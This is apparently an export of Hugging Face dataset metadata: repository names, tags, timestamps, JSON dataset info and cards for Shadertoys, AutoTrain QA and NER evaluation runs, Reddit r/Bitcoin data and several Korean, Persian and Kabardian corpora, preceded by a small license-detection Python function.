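LICENSE_HINTS = ("license", "licence", "copyright", "cc by", "mit", "public domain")

def has_license_hint(code: str, max_lines: int = 10) -> bool:
    head = "\n".join(code.splitlines()[:max_lines]).lower()
    return any(hint in head for hint in LICENSE_HINTS)
```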
Attribution of every data field can be found in the 'author' column, but might not include further attribution within the code itself or parents from forked shaders. | Vipitis/Shadertoys | [
"task_categories:text-generation",
"task_categories:text-to-image",
"annotations_creators:no-annotation",
"language_creators:machine-generated",
"size_categories:10K<n<100K",
"language:en",
"language:code",
"license:cc-by-nc-sa-3.0",
"code",
"region:us"
] | 2022-07-24T14:08:41+00:00 | {"annotations_creators": ["no-annotation"], "language_creators": ["machine-generated"], "language": ["en", "code"], "license": ["cc-by-nc-sa-3.0"], "multilinguality": [], "size_categories": ["10K<n<100K"], "source_datasets": [], "task_categories": ["text-generation", "text-to-image"], "task_ids": [], "pretty_name": "Shadertoys", "tags": ["code"], "dataset_info": {"features": [{"name": "num_passes", "dtype": "int64"}, {"name": "has_inputs", "dtype": "bool"}, {"name": "name", "dtype": "string"}, {"name": "type", "dtype": "string"}, {"name": "code", "dtype": "string"}, {"name": "title", "dtype": "string"}, {"name": "description", "dtype": "string"}, {"name": "tags", "sequence": "string"}, {"name": "author", "dtype": "string"}, {"name": "license", "dtype": "string"}, {"name": "source", "dtype": "string"}], "splits": [{"name": "train", "num_bytes": 162960894, "num_examples": 37841}, {"name": "test", "num_bytes": 26450429, "num_examples": 6617}], "download_size": 86294414, "dataset_size": 189411323}} | 2023-06-26T18:04:58+00:00 |
bb5c85533e51ecd070d479ccb23e10c92bed9dfe | nateraw/sqllitetest | [
"license:mit",
"region:us"
] | 2022-07-24T18:38:50+00:00 | {"license": "mit"} | 2022-07-24T18:44:41+00:00 |
|
fbb486cd44835e75f925e1318193c0b77da9c0cc | nateraw/snowflaketest | [
"license:mit",
"region:us"
] | 2022-07-24T19:17:36+00:00 | {"license": "mit"} | 2022-08-01T15:20:03+00:00 |
|
c876612cc6bf2807af9ec786b6303390d47ecd9d | devmehta787/wav2vec2-xlsr-hindi | [
"license:afl-3.0",
"region:us"
] | 2022-07-24T19:54:16+00:00 | {"license": "afl-3.0"} | 2022-07-25T07:28:19+00:00 |
|
3beff0e67d14889b60f313701a936360828e1283 |
This repository contains a slightly modified version of https://github.com/lang-uk/ukrainian-word-stress-dictionary, to be used in a text-to-speech project based on Tacotron 2 | Yehor/uk-stresses | [
"uk",
"region:us"
] | 2022-07-24T19:54:28+00:00 | {"tags": ["uk"]} | 2022-07-28T12:57:39+00:00 |
cdef59ebbf0590d84506524cf199a419c036f728 | jack66931/ClassTest | [
"license:unknown",
"region:us"
] | 2022-07-24T20:30:41+00:00 | {"license": "unknown"} | 2022-07-24T20:30:41+00:00 |
|
47e32b8a853777f36903af82a1008f5d3f230d2a | - kowiki202206: one-line-per-entry corpus (Korean Wikipedia, June 2022)
| bongsoo/kowiki20220620 | [
"language:ko",
"license:apache-2.0",
"region:us"
] | 2022-07-25T03:45:16+00:00 | {"language": ["ko"], "license": "apache-2.0"} | 2022-10-04T23:08:42+00:00 |
f851e9309b7e3160f513f254bf9d98976d162d6c | actdan2016/dandna | [
"region:us"
] | 2022-07-25T04:43:40+00:00 | {} | 2022-10-13T05:39:19+00:00 |
|
79cedccdca57aee5a769b1898987f489c8aa3b8b | - Evaluation corpus | bongsoo/bongevalsmall | [
"language:ko",
"license:apache-2.0",
"region:us"
] | 2022-07-25T05:04:14+00:00 | {"language": ["ko"], "license": "apache-2.0"} | 2022-10-04T22:48:22+00:00 |
8e5abafb2af8f768229735214b911e7aa9c7603b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-fdec2e9c-11705559 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T06:24:04+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T06:29:26+00:00 |
a6036b2dcc7768e2940fcab790fd0a42fa5a387d | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-8b8e12f7-11715560 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T06:28:43+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": ["squad_v2"], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T06:33:16+00:00 |
eee0a8ef4396cb4882284ec2fda1d0ccfd8d5550 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: Shanny/bert-finetuned-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ola13](https://huggingface.co/ola13) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-810261fd-11725561 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T08:33:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "Shanny/bert-finetuned-squad", "metrics": ["accuracy"], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T08:36:36+00:00 |
9dfd7de60214c80b44de6a81dda0902c12675511 | naem1023/augmented-namuwiki | [
"license:apache-2.0",
"region:us"
] | 2022-07-25T10:02:14+00:00 | {"license": "apache-2.0"} | 2022-07-25T11:45:56+00:00 |
|
0364e2cff990bd0fc2e78d963f2d263e9e645a91 | naem1023/augmented-kowiki | [
"license:apache-2.0",
"region:us"
] | 2022-07-25T10:12:25+00:00 | {"license": "apache-2.0"} | 2022-07-25T12:10:57+00:00 |
|
1439a395520ae8c2068bad1e1b07b8d5f052b9be | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-ebf1ec50-11735562 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:33:05+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:37:39+00:00 |
09d0cf6b8b8cf1c47c25270219270ee5b2207921 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745564 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:37:45+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinyroberta-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:40:25+00:00 |
55b56822e4f31bfb149e822c0004ad25ad90fb94 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745565 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:37:49+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:42:15+00:00 |
15a9bdb8362664a48997e28994c2baf46eaa71f2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745563 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:38:34+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:47:52+00:00 |
87c34d7017c665a0bb76b416bcfb62bfe17a2ae6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-26568076-11755566 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:49:05+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-large-uncased-whole-word-masking-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:53:57+00:00 |
de7be88799fc7659e1e51edbcf4a85f37d249e05 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@MichelBartels](https://huggingface.co/MichelBartels) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-df3d9ae8-11765567 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T11:05:23+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T11:13:39+00:00 |
6d87e9c21e26481e929329cd82ed9d27c1e7da26 | naem1023/augmented-concat-100000 | [
"license:apache-2.0",
"region:us"
] | 2022-07-25T13:04:21+00:00 | {"license": "apache-2.0"} | 2022-07-25T13:30:47+00:00 |
|
9d347362dc8663670ef1512728cdaccf282ef29b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Token Classification
* Model: AJGP/bert-finetuned-ner
* Dataset: conll2003
* Config: conll2003
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@hrezaeim](https://huggingface.co/hrezaeim) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-conll2003-2dc2f6d8-11805572 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T13:25:58+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["conll2003"], "eval_info": {"task": "entity_extraction", "model": "AJGP/bert-finetuned-ner", "metrics": [], "dataset_name": "conll2003", "dataset_config": "conll2003", "dataset_split": "test", "col_mapping": {"tokens": "tokens", "tags": "ner_tags"}}} | 2022-07-25T13:27:10+00:00 |
249e666291cd556d0c0c7967ee3cb6967d77b56c |
# Dataset Card for Stock-QA-fa
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:**
- **Repository:**
- **Paper:**
- **Leaderboard:**
- **Point of Contact:**
### Dataset Summary
[More Information Needed]
### Supported Tasks and Leaderboards
This dataset is intended to serve as a reference for question answering (QA) tasks.
### Languages
Persian
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
[More Information Needed]
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
All annotations are done according to the SQuAD2.0 data format.
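For reference, a single record in the SQuAD2.0 format looks roughly like this (all values are illustrative placeholders):
```
{
  "data": [{
    "title": "Document title",
    "paragraphs": [{
      "context": "A passage about the stock market ...",
      "qas": [{
        "id": "0001",
        "question": "A question about the passage?",
        "is_impossible": false,
        "answers": [{"text": "answer span", "answer_start": 42}]
      }]
    }]
  }]
}
```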
### Source Data
#### Initial Data Collection and Normalization
All contexts and some of the questions are retrieved from [Faradars Introductory Course to Stock Market](https://blog.faradars.org/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%88%d8%b1%d8%b3-%d8%b1%d8%a7%db%8c%da%af%d8%a7%d9%86/).
#### Who are the source language producers?
Persian (Farsi)
### Annotations
#### Annotation process
All annotations are done via the Deepset Haystack annotation tool.
#### Who are the annotators?
Hesam Damghanian (this HF account)
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
[More Information Needed]
| hdamghanian/Stock-QA-fa | [
"license:mit",
"region:us"
] | 2022-07-25T14:06:08+00:00 | {"license": "mit"} | 2022-07-25T14:16:43+00:00 |
e56574b7a9a0bb7c86f71d6350a3a3a5e68646b1 | cakiki/ASE_runs | [
"license:apache-2.0",
"region:us"
] | 2022-07-25T17:09:35+00:00 | {"license": "apache-2.0"} | 2022-07-25T17:11:20+00:00 |
|
3038d9967602ee1ba85340246bcd49bb52fd3bef |
# Dataset Card for reddit-r-bitcoin-data-for-jun-2022
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Licensing Information](#licensing-information)
## Dataset Description
- **Homepage:** [https://socialgrep.com/datasets](https://socialgrep.com/datasets/reddit-r-bitcoin-data-for-jun-2022?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
- **Reddit downloader used:** [https://socialgrep.com/exports](https://socialgrep.com/exports?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
- **Point of Contact:** [Website](https://socialgrep.com/contact?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
### Dataset Summary
Lite version of our premium [Reddit /r/Bitcoin dataset](https://socialgrep.com/datasets/the-reddit-r-bitcoin-dataset?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022) - CSV of all posts & comments to the /r/Bitcoin subreddit over Jun 2022.
### Languages
Mainly English.
## Dataset Structure
### Data Instances
A data point is a post or a comment. Due to the separate nature of the two, they exist in two different files, even though many fields are shared.
### Data Fields
- 'type': the type of the data point. Can be 'post' or 'comment'.
- 'id': the base-36 Reddit ID of the data point. Unique when combined with type.
- 'subreddit.id': the base-36 Reddit ID of the data point's host subreddit. Unique.
- 'subreddit.name': the human-readable name of the data point's host subreddit.
- 'subreddit.nsfw': a boolean marking the data point's host subreddit as NSFW or not.
- 'created_utc': a UTC timestamp for the data point.
- 'permalink': a reference link to the data point on Reddit.
- 'score': score of the data point on Reddit.
- 'domain': (Post only) the domain of the data point's link.
- 'url': (Post only) the destination of the data point's link, if any.
- 'selftext': (Post only) the self-text of the data point, if any.
- 'title': (Post only) the title of the post data point.
- 'body': (Comment only) the body of the comment data point.
- 'sentiment': (Comment only) the result of an in-house sentiment analysis pipeline. Used for exploratory analysis.
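Since posts and comments ship as separate CSV files, they can be loaded independently. A minimal pandas sketch follows; the file names are assumptions based on the dataset description and should be adjusted to the actual download.
```python
import pandas as pd

# File names are assumptions; adjust to the CSVs in the actual download.
posts = pd.read_csv("bitcoin_posts.csv")
comments = pd.read_csv("bitcoin_comments.csv")

# Example: average comment sentiment per day. 'created_utc' is assumed to be a
# Unix timestamp in seconds, per the Data Fields list above.
comments["date"] = pd.to_datetime(comments["created_utc"], unit="s").dt.date
print(comments.groupby("date")["sentiment"].mean().head())
```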
## Additional Information
### Licensing Information
CC-BY v4.0
| SocialGrep/reddit-r-bitcoin-data-for-jun-2022 | [
"annotations_creators:lexyr",
"language_creators:crowdsourced",
"multilinguality:monolingual",
"size_categories:100K<n<1M",
"source_datasets:original",
"language:en",
"license:cc-by-4.0",
"region:us"
] | 2022-07-25T17:11:58+00:00 | {"annotations_creators": ["lexyr"], "language_creators": ["crowdsourced"], "language": ["en"], "license": ["cc-by-4.0"], "multilinguality": ["monolingual"], "size_categories": ["100K<n<1M"], "source_datasets": ["original"]} | 2022-07-25T17:22:16+00:00 |
24f194c5b6ef29eb784ea3508a022ba848beeea4 |
kbd (Latin script): 835k lines from a scraped text pile
ru: 3M lines from Wikipedia (OPUS) | anzorq/kbd_lat-835k_ru-3M | [
"license:unknown",
"region:us"
] | 2022-07-25T17:37:51+00:00 | {"license": "unknown"} | 2022-07-25T22:26:41+00:00 |
71d820d52a2662dd708036a15374bbbd68ff57b9 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825575 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:30:32+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-large-squad2", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:33:19+00:00 |
e53695a23047a407d2999206a03fc82701148a78 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825576 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:30:35+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-large-uncased-whole-word-masking-squad2", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:32:36+00:00 |
2803c28d2003a2afff2a01b409ff7cd42fb0fb17 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825574 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:32:16+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/electra-large-synqa", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:49+00:00 |
4deeac719a3ff3df9b5866646f38a35bc45e3c0b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835577 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:47+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:38:58+00:00 |
34c8374562d8b0e8846c1b926bbe84f4aef4dca5 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835578 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:52+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/electra-large-synqa", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:01+00:00 |
f329c4e36fa98c42ab3d616e01018048364d47e2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835579 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:58+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:01+00:00 |
29dd17d42866336178ac700cbb45bce287a38a34 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835580 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:35:07+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:44+00:00 |
cdfeb9020eb204c2b5b4e28ac3ef7b18a658cb76 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa-ext
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-8ac5f360-11845582 | [
"autotrain",
"evaluation",
"region:us"
